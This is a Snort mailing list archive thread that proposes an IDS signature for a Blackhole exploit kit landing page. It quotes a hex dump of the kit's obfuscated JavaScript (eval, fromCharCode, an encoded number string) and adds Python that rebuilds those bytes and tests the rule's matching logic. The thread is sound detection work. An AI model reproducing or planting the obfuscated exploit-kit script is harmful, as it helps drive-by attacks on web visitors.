Snort mailing list archives
Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch qq"
From: Joel Esler <jesler () sourcefire com>
Date: Wed, 7 Mar 2012 11:01:23 -0500
Thanks Nathan,

We'll take a look at this.

--
Joel Esler
Senior Research Engineer, VRT
OpenSource Community Manager
Sourcefire

On Mar 7, 2012, at 10:55 AM, Community Proposed wrote:
Please see the below for a variant of the catch(qq hostile blackhole exploit kit initial landing. VRT -- PCAP en-route. Note 'origin community' in metadata, uncertain how the nomenclature for this will be. Not sure if 'origin vrt' and 'origin community' are what you had in mind.

alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (msg:"SPECIFIC-THREATS Blackhole landing page with specific structure - prototype catch qq"; flow:to_client,established; file_data; content:")try{"; content:"prototype}catch(qq"; distance:0; metadata:policy balanced-ips drop, policy security-ips drop, service http, origin community; reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx; classtype:attempted-user; sid:x; rev:1;)

PCAP ASCII Snippet:

0x0470: 6d65 2e35 2e37 2e30 223e 3c2f 6f62 6a65 me.5.7.0"></obje
0x0480: 6374 3e3c 2f68 746d 6c3e 3c73 6372 6970 ct></html><scrip
0x0490: 743e 6966 2877 696e 646f 772e 646f 6375 t>if(window.docu
0x04a0: 6d65 6e74 2974 7279 7b6e 6577 2261 222e ment)try{new"a".
0x04b0: 7072 6f74 6f74 7970 657d 6361 7463 6828 prototype}catch(
0x04c0: 7171 7129 7b7a 7a3d 2765 7661 6c27 3b73 qqq){zz='eval';s
0x04d0: 733d 5b5d 3b61 613d 5b5d 2b30 3b61 6161 s=[];aa=[]+0;aaa
0x04e0: 3d30 2b5b 5d3b 6966 2861 612e 696e 6465 =0+[];if(aa.inde
0x04f0: 784f 6628 6161 6129 3d3d 3d30 297b 663d xOf(aaa)===0){f=
0x0500: 2766 726f 6d43 6861 7227 3b66 2b3d 2743 'fromChar';f+='C
0x0510: 6f64 6527 3b7d 6565 3d27 6527 3b65 3d77 ode';}ee='e';e=w
0x0520: 696e 646f 775b 7a7a 5d3b 743d 2779 273b indow[zz];t='y';
0x0530: 7d68 3d4d 6174 682e 6174 616e 3228 332c }h=Math.atan2(3,
0x0540: 3029 2f4d 6174 682e 5049 2a2d 343b 6e3d 0)/Math.PI*-4;n=
0x0550: 2233 2e35 7033 2e35 7035 312e 3570 3530 "3.5p3.5p51.5p50
0x0560: 7031 3570 3139 7034 3970 3534 2e35 7034 p15p19p49p54.5p4
0x0570: 382e 3570 3537 2e35 7035 332e 3570 3439 8.5p57.5p53.5p49
0x0580: 2e35 7035 3470 3537 7032 3270 3530 2e35 .5p54p57p22p50.5
0x0590: 7034 392e 3570 3537 7033 332e 3570 3533 p49.5p57p33.5p53
0x05a0: 7034 392e 3570 3533 2e35 7034 392e 3570 p49.5p53.5p49.5p
0x05b0: 3534 7035 3770 3536 2e35 7033 3270 3539 54p57p56.5p32p59

Thanks,
Nathan
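The proposed rule chains two content matches, ")try{" and then "prototype}catch(qq" with distance:0, inside the file_data buffer. The following Python is an added example for this archive page, not code from the original post and not Snort's own matcher: it rebuilds the payload bytes from the hex dump exactly as Nathan posted it, then models only the ordering semantics that a second `content` with `distance:0` imposes (the second string must begin at or after the end of the first match). Snort's file_data normalisation, fast-pattern selection and multi-match backtracking are not reproduced. The two negative samples at the bottom are constructed for illustration and do not come from the thread, and the "3.5p3.5p..." string is left undecoded because the decoder is not in the captured snippet.

```python
"""Rebuild the posted Blackhole landing-page payload from its hex dump and
emulate the proposed rule's `content` + `distance:0` chain against it.
Added example for this archive page; not part of the original post or Snort."""
import re

# Hex dump as posted in the thread: offset, eight 16-bit groups, ASCII column.
POSTED_HEXDUMP = """\
0x0470: 6d65 2e35 2e37 2e30 223e 3c2f 6f62 6a65 me.5.7.0"></obje
0x0480: 6374 3e3c 2f68 746d 6c3e 3c73 6372 6970 ct></html><scrip
0x0490: 743e 6966 2877 696e 646f 772e 646f 6375 t>if(window.docu
0x04a0: 6d65 6e74 2974 7279 7b6e 6577 2261 222e ment)try{new"a".
0x04b0: 7072 6f74 6f74 7970 657d 6361 7463 6828 prototype}catch(
0x04c0: 7171 7129 7b7a 7a3d 2765 7661 6c27 3b73 qqq){zz='eval';s
0x04d0: 733d 5b5d 3b61 613d 5b5d 2b30 3b61 6161 s=[];aa=[]+0;aaa
0x04e0: 3d30 2b5b 5d3b 6966 2861 612e 696e 6465 =0+[];if(aa.inde
0x04f0: 784f 6628 6161 6129 3d3d 3d30 297b 663d xOf(aaa)===0){f=
0x0500: 2766 726f 6d43 6861 7227 3b66 2b3d 2743 'fromChar';f+='C
0x0510: 6f64 6527 3b7d 6565 3d27 6527 3b65 3d77 ode';}ee='e';e=w
0x0520: 696e 646f 775b 7a7a 5d3b 743d 2779 273b indow[zz];t='y';
0x0530: 7d68 3d4d 6174 682e 6174 616e 3228 332c }h=Math.atan2(3,
0x0540: 3029 2f4d 6174 682e 5049 2a2d 343b 6e3d 0)/Math.PI*-4;n=
0x0550: 2233 2e35 7033 2e35 7035 312e 3570 3530 "3.5p3.5p51.5p50
0x0560: 7031 3570 3139 7034 3970 3534 2e35 7034 p15p19p49p54.5p4
0x0570: 382e 3570 3537 2e35 7035 332e 3570 3439 8.5p57.5p53.5p49
0x0580: 2e35 7035 3470 3537 7032 3270 3530 2e35 .5p54p57p22p50.5
0x0590: 7034 392e 3570 3537 7033 332e 3570 3533 p49.5p57p33.5p53
0x05a0: 7034 392e 3570 3533 2e35 7034 392e 3570 p49.5p53.5p49.5p
0x05b0: 3534 7035 3770 3536 2e35 7033 3270 3539 54p57p56.5p32p59
"""

# Offset, then exactly eight groups of four hex digits; the ASCII column is ignored.
_DUMP_LINE = re.compile(r"^0x([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{4}\s+){7}[0-9a-fA-F]{4})")


def parse_hexdump(dump: str) -> bytes:
    """Rebuild contiguous payload bytes from tcpdump-style hex lines.
    A gap between consecutive offsets raises, because testing a rule against a
    payload with missing bytes would say nothing about the rule."""
    out = bytearray()
    next_offset = None
    for line in dump.splitlines():
        m = _DUMP_LINE.match(line.strip())
        if not m:
            continue
        offset = int(m.group(1), 16)
        if next_offset is not None and offset != next_offset:
            raise ValueError(f"non-contiguous dump at {offset:#06x}")
        chunk = bytes.fromhex(m.group(2).replace(" ", ""))
        out += chunk
        next_offset = offset + len(chunk)
    return bytes(out)


# The two `content` options of the proposed rule, in rule order.
RULE_CONTENTS = (b")try{", b"prototype}catch(qq")


def rule_match_offsets(payload: bytes, contents=RULE_CONTENTS):
    """Return the offset of each content match, or None if the chain fails.

    `distance:0` on a `content` that follows another means the search for it
    starts at the byte after the previous match with no skip, so each pattern
    must begin at or after the end of the one before it.  Taking the earliest
    occurrence of each pattern is sufficient here: with only `distance` and no
    `within`, an earlier previous match only makes later patterns easier."""
    offsets = []
    cursor = 0
    for pat in contents:
        idx = payload.find(pat, cursor)
        if idx < 0:
            return None
        offsets.append(idx)
        cursor = idx + len(pat)
    return offsets


PAYLOAD = parse_hexdump(POSTED_HEXDUMP)

# Constructed negatives (not from the thread): an ordinary try/catch that even
# reuses the `qq` name, and the two strings present but in the wrong order.
BENIGN_TRY_CATCH = b"<script>if(a)try{b()}catch(qq){}</script>"
REVERSED_ORDER = b"<script>x=[].prototype}catch(qq){}if(y)try{z()}catch(e){}</script>"

if __name__ == "__main__":
    print(PAYLOAD.decode("ascii", "replace"))
    print("posted payload:", rule_match_offsets(PAYLOAD))
    print("benign try/catch:", rule_match_offsets(BENIGN_TRY_CATCH))
    print("reversed order:", rule_match_offsets(REVERSED_ORDER))
```

Against the posted bytes the chain matches at offsets 52 and 64 (relative to the start of the snippet), i.e. ")try{" inside "if(window.document)try{" and the "prototype}catch(qq" that immediately follows. The benign sample shows that ")try{" alone is not the discriminator; the reversed sample shows why the ordering imposed by distance:0 matters when both literals are present.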